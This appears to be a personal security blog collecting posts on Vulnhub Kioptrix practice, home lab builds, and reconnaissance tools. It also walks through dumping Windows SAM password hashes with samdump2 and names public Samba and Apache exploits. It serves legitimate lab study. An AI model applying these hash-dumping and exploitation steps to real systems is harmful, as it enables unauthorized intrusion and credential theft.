Kioptrix 2 – Lessons Learned

Rather than do a traditional walkthrough on most of these, I think I’ll just do a “lessons learned” type thing. That’s more useful for me, and honestly, the world doesn’t need another Kioptrix walkthrough.

So with the first one I feel like I was pretty much successful. I took a generic pentesting methodology and applied using the specific tools I had and it worked out well. With this one, things were a bit more tricky.

Mistake one: I didn’t use anything to enumerate out web pages on the site. So I spun my wheels on the services detected through nmap for much longer than I should have rather than just looking at the index.php page. One look and it becomes pretty clear that the entry point of this VM does not lie in analysis of tool feedback and research of vulnerabilities associated with software. A little SQL injection and you’re in, and given a prompt that runs the ping command. I was able to set up a reverse shell and now we’re in the box as the apache user. This is where the research comes in and reveals a privilege escalation vulnerability for the linux kernel.

Mistake two: I missed the hardcoded credentials in the index.php source code. If the objective is just to own the box, well that’s not of too much consequence. But the objective here is really just to get as much info as possible and missing that bit of data is instructive for the future.

So far, my objective has been to stay away from Metasploit and see what I can do manually and it has been working out. These haven’t been challenging but there are inefficiencies and things I miss so I need to shore that up. I’m making a playbook for these machines and making some adjustments based on my results. Next up: Kioptrix 3.

Kioptrix 1 – First up

Diving in, my hope is to run through some of these Vulnhub instances and practice enumeration, exploitation (of course), and documentation. The goal is to begin the OSCP course in about a month, coinciding with graduation time. In the meantime I also want to develop some proto-scripts for scripting enumeration, so the focus on enumeration for me. And we’re starting with Kioptrix 1.

First off, netdiscover, match the MAC to the MAC in the ESXi settings, acquire IP

And then nmap. Keeping it simple, just an -sV.

Got some services and right off the bat we have some candidates. But let’s flesh it out and do some nikto:

I followed this up with a bunch of nmap scans that I won’t bother postiing pictures of. Basically, enumeration scripts, including http-enum and a few smb-enum-* scripts. None really gave much information.

Nikto showed us a few directories and two accessible webpages, one the default Apache webpage and one a php page named test.php that doesn’t appear to do much. Looking at rpcbind, I checked out a suggestion found online to look for rpcinfo and check for mounts. No joy, but a worthwhile effort:

After that we look at our candidates from the scans. First we have the Apache version. We also have OpenSSH, which we won’t really talk about since there does not seem to be a publicly available exploit for this version. Next we have port 139, which means netbios, which means Samba most likely. We’ll use enum4linux to pull some more info there:

It’s a lot of text, but if you dig in there you’ll find that we are dealing with Samba 2.2.1a. And exploit-db has a lot to say about our Samba version. I pulled the exploit from that link and compiled (gcc -o samba_sploit 10.c) and it ran without a hitch.

Apache is a little more intense. The code on exploit-db doesn’t compile as is. Luckily an industrious young hacker has provided steps for updating the code, however you’ll find that it still won’t compile, complaining a lot about SSL2. Turns out you will need to install libssl1.0-dev (look in the comments) as well, and it then compiled nicely.

Running OpenFuck -h you get a long list of potential targets. Look for our Apache versions on the list (ignore the OS versions) and try them one by one. Process of elimination yields us this:

Nicely. Lessons learned: don’t give up if the exploit isn’t working, took a while to find the answer on the Apache vuln here. Also wish I had done a better job documenting. My intent is to get to the point that I am doing it in the OSCP format so I’ll be ready. Next up: Kioptrix 2.

 

Updating the Home Lab

When I set my lab up my primary concern was keeping costs fairly low. My needs were not, and probably still are not, for a powerful system. Just a capable one, even if only barely so. The setup I had fit the bill. A 90 dollar expense through eBay, another 25 or so for RAM got me a machine with dual Xeons, 32 GB RAM, it go the job done.

Then I turned it on. And then this happened with the power:

So in the interest of global warming and the future of humanity, I came up with another solution. I ended up on the SuperMicro e200-8d, which has a single Xeon with six cores, and 64 GB of RAM. All that with only a 60 watt power supply. This was significantly more expensive, though. Approximately 800 for the server alone and another 400 for RAM. I have enough room to expand to 128 GB but couldn’t justify the expense quite yet, given my usage.

The SuperMicro server has an IPMI interface. The Dell server I had before did as well, but mine never worked and I was never motivated enough to troubleshoot it. The remote management is a really nice feature.   I didn’t think ahead to benchmark the old server so i can compare, but there’s no nee really. The SuperMicro is an incredible upgrade.
The only drawbacks, so far, is the cost and the RAM. According the the Internet, which is never wrong, this model has compatibility issues with RAM. Luckily, SuperMicro provides a list of RAM models verified to work. Unfortunately, these are all quite expensive. This took the total price up close to 1300 dollars. If I needed the full 128 GB, it would have been 1800. That’s a lot of pressure to make the purchase worthwhile, which is good in a way. Still, one of my primary concerns was keeping the lab as cheap as possible and this has hosed that goal completely. 

Projects so far: all-purpose Ubuntu server which serves as a OpenVPN server and whatever other junk I want to throw on it (twitter bots, etc), pentesting lab, Metasploitable 3.

Projects in the works: build my own AD forest, hook up some automation, enhanced pentesting lab, solve world hunger.

Here’s the new server sitting on top of the old one:

Using samdump2

In Penetration Testing, Weidman walks you through pulling hashes from the Security Account Manager (SAM) database on a Windows machine. SysKey is the Microsoft utility that encrypts the SAM database. SysKey uses the bootkey for encryption, which is actually an amalgamation of four separate keys contained in hidden fields within the registry. Luckily there are some tools that do the hard work of extracting the key for us

In the text, bkhive is used to extract the key and then samdump2 is used to decrypt the SAM database and reveal the password hashes. The hashes must then be cracked using John the Ripper or another similar hash cracking tool.

When walking through the scenario in the text, there are a few issues. First, bkhive is no longer pre-installed on Kali. It isn’t necessary for it to be installed, as samdump2 can perform both functions, but the syntax is not readily apparent and searching on the Internet yields a lot of outdated information on using bkhive in conjunction with samdump2. Previously bkhive would be the tool that extracted the key from the SYSTEM hive and samdump2 would take that key, decrypt the SAM file. This gives you the password hashes and associated accounts for the machine. There are two solutions to get this working again: install older versions of bkhive and samdump2 software and use those or use samdump2 for both functions.

First, we’ll install the old versions. This is a bad way to do things, but doing this will allow you to follow the example in the text as written. This took longer to figure out than I care to admit.

The Kali repositories have bkhive available, however installing from the repo does not give you a usable application, instead building out directories in /usr/share and placing documentation in those. Older versions of the software are maintained online and can be downloaded:

wget http://http.us.debian.org/debian/pool/main/b/bkhive/bkhive_1.1.1-1_amd64.deb

apt-get install libssl-dev

dpkg -i bkhive_1.1.1-1_amd64.deb

 Now you have a version of bkhive that will work with the steps and syntax in the text. But the installed version of samdump2 still won’t accept the key as input, it is looking for the SYSTEM hive.

So to roll back the version of samdump2, first we have to install libssl1.0.0:

wget http://security.debian.org/debian-security/pool/updates/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u5_amd64.deb

dpkg -i libssl1.0.0_1.0.1t-1+deb8u5_amd64.deb

Now install the old version of samdump2:

wget http://http.us.debian.org/debian/pool/main/s/samdump2/samdump2_1.1.1-1.1_amd64.deb

Dpkg -i samdump2_1.1.1-1.1_amd64.deb

And now we follow the example in the text:

The simpler, and definitely preferable, alternative is just to use samdump2 for both key extraction and for pulling the hashes out of the SAM database. The syntax is pretty simple:

samdump2 SYSTEM SAM > hashes.txt

This command takes the location of the key to be extracted, the location of the SAM database, performs the extraction, decrypts the SAM database, and then outputs the results to hashes.txt. There are options for debugging if needed, available in the command help. Simple enough! Now using either method you have hashes ready to be cracked.

Moar Recon: Netcat and Web Vulnerabilities

I wanted to add a little more detail to what I’m doing with reconnaissance, but I want to be careful not to just copy the stuff in the book. I don’t think that adds anything of value when trying to learn, plus I don’t think anyone would appreciate me uploading their book to the internet one chapter at a time.

So to take it a little further and focus more on OSCP objectives, as I’ve understood from my research, we want to do as much of this enumeration as we can without tools like Nessus. The first thing to try is running nmap scripts. Nmap comes with a ton of scripts loaded that can gauge for vulnerabilities, perform exploits, detect service versions, plus a ton of other things. For my purposes I’m only running the default scripts to just get an idea of what they do.

nse1

We get a ton of information here. From the top, we see FTP. It has run a script and tested anonymous logon and found that open. We can dig just a little deeper and see if we can find anything else with netcat:

nc-ftp1

Netcat displays the version and would allow us to log in. We can do a search and find that there doesn’t seem to be any exploits associated with this particular version of Filezilla. Moving on, we see that SMTP was listed along with a list of available commands. From here we can attempt to verify any possible account names we may think we have. The nmap scan shows us that ports 80 and 443 are hosting websites is XAMPP 1.7.2. We can verify this pretty easily:

xampp1

We can use netcat again to connect and find out a little more information about the server. What kind of web server is it running? What supporting services?

nc-http1

This is my first time really using netcat operationally, I’m familiar with the functionality and syntax but now we’re in it. As you see above, I get what appears to be an error. Even though we get an error, we still get the information we were looking for. The server is running Apache 2.2.12, WebDAV 2 is running which we know from the text should be examined for default credentials, and php 5.3 is running.

I tried to dig more into the error and decided to fire up Aule (vulnerable Ubuntu machine that is designed for use with the book) and try that. So the website works:

aule1

And we try netcat:

nc-aule-http1

And get a similar error, but again we get the header information we were looking for. This needs more testing, right now on every server I have with a website I get back the “bad request” error but it isn’t the end of the world since I get the header info and that is my objective right now.

One of the things the book points out about Lorien is that it is running phpmyadmin, because it comes in XAMPP. Since it is there in black and white, we know to check it. But how could we use a tool to find this out if it were not in the book? Using Nikto we can scan Lorien to see more information about available web interfaces:

nikto-lorien1

I ran it this way to just get an idea of the output. For Lorien I got a lot of output and it was easier to pipe the Nikto results into a text file and go through it that way. Nikto enumerates each available directory and we can look at the web pages associated with those. Like the /server-status page:

lorien-site-enum1

The server information we have here matches up with the results of the Nikto scan, the netcat results, the nmap scan, the Nessus scan, and the OpenVAS scan. Which is cheating, since Nessus and OpenVAS actually use nmap. But still important to note the different ways to get needed info.

Further down the directory list we see /server-info:

lorien-site-enum4

Again, we see the server info. But there is much more. We have the root directory right there, which if we didn’t already know would help us with directory traversal. We have the location of various configuration files. Hey let’s look at at mod_alias.c, the Apache file that maps URL requests to aliases (among other things):

lorien-site-enum5

We see several accessible directories and can try each one. Hey look, it’s phpmyadmin:

lorien-site-enum2

We can look at this service and determine vulnerabilities, but the page is helpful as well:

lorien-site-enum3

Oh my…

There are some other issues to identify here from the book, but I’m more concerned with how to get the info on my own and using tools I know rather than just reading the vulnerability info from the book. We have enough information now to move forward. One thing I do want to investigate is credentials. From the book we know that WebDAV is running here with default credentials, however I need to identify the best way to discover that using available tools. 

This is finals/project presentation time at school so I have no idea when I will get a chance to move forward with my lab. At least a week I am thinking.

Reconnaissance: Do it

We perform reconnaissance in order to learn about the environment. This is a pretty simple concept, but important to keep in mind. Yes, you’re running nmap, but why are you running it? To identify system attributes. Why? Each action must be considered in context of the ultimate goal. The ultimate goal in our case is access to data on a target machine. How do we get there? Let’s break it down.

We do scans in order to identify attack surface and possible vulnerabilities. Easy enough, but important to consider when planning. Each tool may have strengths and weaknesses, but understanding what the tool is telling you is more important.

In my lab, keep these names in mind: Morgoth is our attacker (Kali rolling release, whatever they’re up to), Lorien is an XP machine running SP2, and Ulmo is a Win7 machine running SP1 with no updates.

To suit up first off we need to add a couple of things to Morgoth. Kali comes with a ton of tools but I want a couple non-standard ones just to have a comparison. Nmap is great and I know Nessus well, but if we’re going to do this I want to see what results look like from multiple sources and compare, then try and figure out why they might give different results. So I chose to install Angry IP Scanner and OpenVAS. Neither of these are tools I have any experience with but they give that alternative comparison.

Installing ipscan is simple, we open a browser on Morgoth and navigate to http://http://angryip.org/download/ and download the .deb file. Open a terminal and install:

sudo dpkg -i ipscan_(versionnum)_(cpu).deb

Easy. Now to install OpenVAS, the Open Security folks have kindly packaged it up and put it in the Kali repo. So simply run:

sudo apt-get install openvas

And there we go. At this point, I ran out of space on my hard drive and had to take a brief detour. So it goes. So a reminder, make sure the basics of your system are good, or at least take a snapshot of your VM so you don’t end up like me spending a day rebuilding. After downloading and installing OpenVAS, run the initial setup script:

sudo openvas-setup

This will set up the OpenVAS database and download plugins. It takes a bit of time. Once it is done, it will give you the admin password. Navigate to the web console at 127.0.0.1:9392 and you log into the console with admin as the username and the password generated during setup. It’s now ready to scan.

First we start off with nmap. I’m sticking with results on Lorien just to save time. Results are being recorded in KeepNote, an open source reporting tool included in the Kali build. Not going to waste time going through every option with nmap, for the purposes of this test I ran SYN, UDP, and version scans. The SYN scan results are below:

nmap1

We should run ipscan at this point to compare the results. Type in ipscan at the command prompt to launch the ipscan interface. The tool is pretty intuitive, you input the IP of the target and run it. You do need to expand the port range if you are looking to do a port scan. Below is an example of a port scan with Angry IP Scanner:

ipscan

The takeaway when comparing results between these tools is that they seem to be geared at different purposes. Angry IP Scanner is much quicker than nmap, especially on multiple targets. Nmap can provide more detailed information in a more easily exploitable format, so I think your choice really boils down to your goals. In each case ask the question: what is the tool telling me? We are seeing externally available IP and port information for the target system. This points to services the system is running, attackable surface. Knowledge of vulnerabilities in those services can come through independent research, or from a vulnerability scanner.

OpenVAS and Nessus provide very similar results. Here are the Nessus results:

nessus1

And the OpenVAS results:

openvas1

The results are similar, but there are some differences. OpenVAS was apparently branched out from Nessus back when it was open source, so there are bound to be similarities. Nessus has the familiar plugins with easy to remember plugin numbers, OpenVAS has Network Vulnerability Tests (NVTs) listed by a complicated OID. The default report in OpenVAS lists findings by CVSS score and provides some context that Nessus doesn’t, for instance listing Lorien as running on an outdated OS. Simple finding that is readily apparent by the Nessus results, but the distinctions are important. It is worth running both tools to see what, if any, differences come up. Nessus Home edition is not nearly as intuitive and easy to use as the Enterprise edition, learning to use the API may help with that.

Now we’re at the point with the lab where we have identified services and vulnerabilities. Moving forward. I have a list of projects now. I plan on doing the next chapter, which I am fairly excited about for it’s focus on ARP/DNS poisoning. I am also interested in recreating the Poisontap device. It does not look like I will make my December 1st deadline for wrapping this book up but I think there is value in trying to take the lessons a bit further and learn something.

BSides DC was Awesome

BSides DC came and went. It was a great time. The training was great, the talks were great, everything was just great.To me, it seemed like the theme of the talks this year, if there was one, was risk management. Although I don’t think that was intentional.

I volunteered this year, and it was gratifying. I got to help out, meet people,and get some insight into exactly what it takes to put one of these conventions on. There were a couple of talks that I thought were just terrific, but volunteering was probably the highlight.

Liam Randall’s Bro class is pretty well known, so I knew that going to that would be a great opportunity. And it was, it served as an excellent primer on what Bro is, what it can do, and how your can implement it in your environment. My takeaway was definitely that we need Bro and this is something I want to learn. There’s a huge community surrounding Bro, being open source that seems to happen, and a lot of material to dig into.

The vulnerability management talks, specifically, were inspirational to me. Gordon McKay’s talk about missing context in vulnerability management platforms was great, and the guys from Breakpoint Labs did a talk about how to take the next step after you do automated testing (not posted to Youtube yet). The first talk, to me, was great because it was something I hadn’t thought of but made sense immediately. The second because it validates everything I’m doing right now.

BSidesNoVA is coming up, already registered for that and a malware analysis class there as well. But it is only a two hour class so I volunteered for that as well. I’ll definitely volunteer for BSides Charm. And tickets to Shmoocon go up in about a couple of days. Lots of stuff going on. I’ve given myself until December 1st to complete the book I’m working through and move on to the next phase. Which is plenty of time, really, but I am behind. If it weren’t for school I would be much further along, but oh well, all pays off in the end.

tumblr_o2np7u8my81tqg1b5o1_500

Effective Threat Intelligence – A Book Review

Buzz words always annoy me, both their use and the lack of thought that people put into them. To me, “threat intel” has always been one of those things. “You need to integrate a threat intelligence platform into your risk mitigation plan.” ← actual words that were said to me once. That’s sounds like just meaningless wharglbhargl.

But someone recommended this book, entitled Effective Threat Intelligence by James Dietle, and it was on sale on Amazon and I thought “what the heck.” Turns out, it is a good read. A nice primer.

51i9fedpskl

If I had to sum the book up it would be this: you’re already doing threat intelligence. Reading your twitter feed, blogs, news sites, or even the curated lists and products provided by vendors. Everyone is doing this to some degree. There are two main concerns when thinking about threat intelligence: is what you are doing effective and is it customized to your specific environment?

Beyond the hype, the idea of threat intelligence is pretty integral to the security of a given environment. Analysts are always harping on the necessity of knowing your environment, that means understanding what are the threats and what are not the threats. Both of these data points can be useful. Once the possible threats are understood to some degree that is when it is possible to customize the threat intelligence you are already getting to the environment.

All of this is obvious, and yet not being done in many cases. Vulnerability management is done by severity rather than risk management with a proper threat analysis backing that up. Did you patch all the purples? Maybe the reds? Then you won. But if you are doing your “threat intelligence” well, you know that isn’t the truth. The news and twitters and <insert source> are full of examples of organizations failing to properly analyze their environments and, even in a relatively robust VM program, paying for it.

The book is only a primer, it doesn’t get deep on any particular topic. I do like that it addresses team dynamics and incident response to some degree, and that it looks at the human factor behind a lot of the issues.It is a short book, but a good jumping off point to many more specific books on the subject and I really like that. There are a thousand different ways a person could go after reading this book and then wanting to know more.

I’m glad I read that, but now school has started and I’m starting a new job so no more luxury reading for me. 3 classes to go then I am done with college. My big data/systems engineering course seems like a mountain of information. And my other course is… incident response/threat intelligence! Still working on the lab and coding and side projects, as always, but that work is going to slow way down with the school load creeping in.

Also, I’m volunteering for B-Sides DC and coming up with new ideas for talks at NOVAHackers. I plan on giving a talk there in October, depending on if my idea pans out and is interesting. I’ve had a dozen ideas but the one I think I am going with is breaking down Hackerboxes, seeing if I can work through them with my daughter and if they are a good value compared to buying the parts separately at Amazon or Microcenter or something. We shall see. Also at B-Sides DC, a full day class on Bro. I hope to have some time to spend on that beforehand so I can really get the most of the class when I go.

So much going on, it is hard to keep my goals in mind. It’s a challenge to be sure.

Even Moar Pentest Lab: Installing VMWare 6.0

So after setting up the NAS yesterday my goal for today was to get back into python. As an update on that, my python is coming along, I finished Python Crash Course and most of the way through Automate the Boring Stuff with Python. I’ve been through the first 4 chapters of Penetration Testing, and have learned a lot of cool stuff.

first_shell_zomg

This summer has been very productive for me, all things considered. But it is drawing to an end, sadly, and with school starting up this week I’ll have less time for my side projects. So I should have been pressing ahead with working the python projects from the books or working the pentesting chapters… but instead ADD won the day and I am finishing out building my lab.

I installed ESXi to run from a USB on my Dell Poweredge 1950. After upgrading it to now have 32 GB of RAM, more than enough for my purposes. Right now I’m just running the pentest lab, which should only consist of a few machines at any given time, but I have other projects in mind down the line that this will be useful for.

The installation was painless. Download the software, available for a free trial from VMWare, or get it licensed from another source. I am still with George Mason University, so we have a deal where we get licensed VMWare products for free. The download, at least in the case of mine, comes with two files. One is a .iso file that will be the server installation files. The other is the management client for Windows.

Burn the .iso file to  disc, it could also be burned to a USB if you aren’t from the ancient past, but I went with the disc because I am a wasteful American, and because I wasn’t sure how the server would react loading the software from USB to USB similar to the NAS4Free install. Probably would work fine though. Insert the “destination” USB into the back of the server. Power the server on, insert the disc, navigate to the boot menu, and boot from disc. The installation to USB is quite easy, follow the prompts and when instructed remove the disc and reboot.

Upon reboot, bring up the BIOS menu and set the boot order. This will differ from server to server.  On my server, the rear USB interface is treated as a hard drive for boot order purposes, and the individual hard drives can be sorted for boot order, so I set the USB drive as the main “hard drive” for boot and set the boot priority for hard drive to 1. This will differ from server to server.

Once the server comes up, navigate in a web browser to the listed IP (assuming you have DHCP configured and the server was automagically assigned an IP, if not….). If the webpage for ESXi displays, then you’ve won. You can download the vSphere client from the link of the webpage or use the file from the initial software download. Install this software on your Windows client, following the default prompts. Once installed, start the software and navigate to the server’s IP. Authenticate using the username root and the password you set up during installation.

Open the NAS management console, in this case I used NAS4Free of course. Navigate to the Services>NFS menu. First head to the Shares tab and input the name of the share and the network to which the share should be accessible. Then select Save and Apply Changes. Remember that every time you do anything with NAS4Free, you have to select Apply Changes.

create_nfs

Once complete navigate back to the Settings tab. Ensure that Enable is selected. I chose to enable NFSv4, I don’t know what the difference is really beyond what was immediately available on Wikipedia, so that’s a problem for future me. But it seems like the smart move. Select Save and Restart to bring the share up. You have to repeat this step and the previous one for each disk to be shared.

restart_nfs

Back in vSphere, navigate to the Inventory tab. You should see a prompt to create a data store, if not go to the Configuration tab. Select Add Storage and then select NFS Store and then Next.

mount_nfs

On the next window, input the IP of the NAS server and the path, not the name, of the share you are adding. Give it a unique name and hit next.

mount_nfs2

Repeat this process for each disk you have to mount on the NAS. Once completed, you should see each disk attached to VMWare within vSphere.

nfs_success

Since I had already created several VMs on my laptop, in order to get them onto the datastore I will have to export them from VMWare Workstation and then import into vSphere. In order to export the VMs, in VMWare Workstation select the VM to be exported and then go to File>Export to OVF. In vSphere, g to File>Deploy OVF Template and select the template in order to import the VM into vSphere.

ovf_deploy

Once imported, navigate to the system in vSphere and console in to change the IP and hostname, if necessary. Pretty easy stuff, minimal surprises or roadblocks. This is basically an enterprise deployment of VMWare, minus the STIGing and other concerns. Which will come in a future update I am sure!

Moar Pentesting Lab – Setting up a NAS

First off, errata from the last post. Working through the Weidman book, the copy of Windows XP SP 3 I listed doesn’t work for the exploits listed in the book and the security updates applied can’t be uninstalled. Windows XP SP2 does work, however I have yet to find a good, clean source for this.

Time to move on and set up the home NAS that will support my VMWare infrastructure. I decided on NAS4Free, since FreeNAS no longer supports x86 systems and my intent is to repurpose an old 32 bit system to support this. This isn’t necessarily the “right” or “best” way to do this, but it is what it is. And it works, very well. We’re doing an embedded USB install here, for ease of use and (hopefully, we’ll see) updating.

Use Win32 Disk Imager, located here to place the NAS4FREE image onto a USB. The image depends on the type of system, I’m using an old 32 bit system so I picked the 32 bit image for version 10.3.0.3. Pick the appropriate image from here and download that. Using the tool to load the image is pretty painless.

Once that is complete, set the system to boot from USB in the BIOS setting and reboot, with your USB attached. Connect a second USB stick to the system. Once the system completes booting, select the first option in order to create an embedded USB install. The system will then prompt you to select a “source” disk, you should pick the USB with the image loaded onto it. The system will then prompt you for a “destination” disk, select the second USB drive. The install will then complete and the server will become available on 192.168.1.250 on your local network. This can be changed from the console if needed.

From a desktop, navigate in a web browser to http://192.168.1.250 and login using the username admin and the password nas4free. Once logged in you can change these values in the System>General menu. Navigate to the Disks>Management menu.

In order to manage the disk, they must first be imported. This walkthrough assumes the disks have no data on them. Select Import Disks under the HDD Management tab. Once completed, switch to the HDD Format tab. It defaults to ZFS Storage Pool, but since ZFS is incompatible with Windows I switched this to UFS. Select UFS, select all disks, and select Next to continue to the next menu. The Minimum Free Space setting defaults to 8%, leave that at the default and input a volume name. Select Next again and begin the formatting process. Once that is complete, it is time to mount the drives.

import

There is an option to create a RAID, after some deliberation I decided against it. RAIDs are really useful for fault tolerance, which isn’t a requirement in my home lab. If you aren’t running real-time backups suited for a home network (ie crashplan, carbonite, custom solution, etc) then this may be a consideration.

Navigate to the Services>CIFS/SMB menu. Select the Shares tab and create shares for each disk, using a custom name for each. Once complete, navigate back to the Settings tab and ensure that Enable is selected under CIFS (it is on the right side). Once this is complete, save and restart. The shares will not be accessible until you select Save and Restart.

nocomment

Once this is complete, map the drives under Windows and they should be accessible. Map them as the name, so \\192.168.1.250\mount_1 from my example picture would map the first disk. Step 1 was setting up the VMs. Step 2: Make a NAS is complete. Now to get the ESXi server up…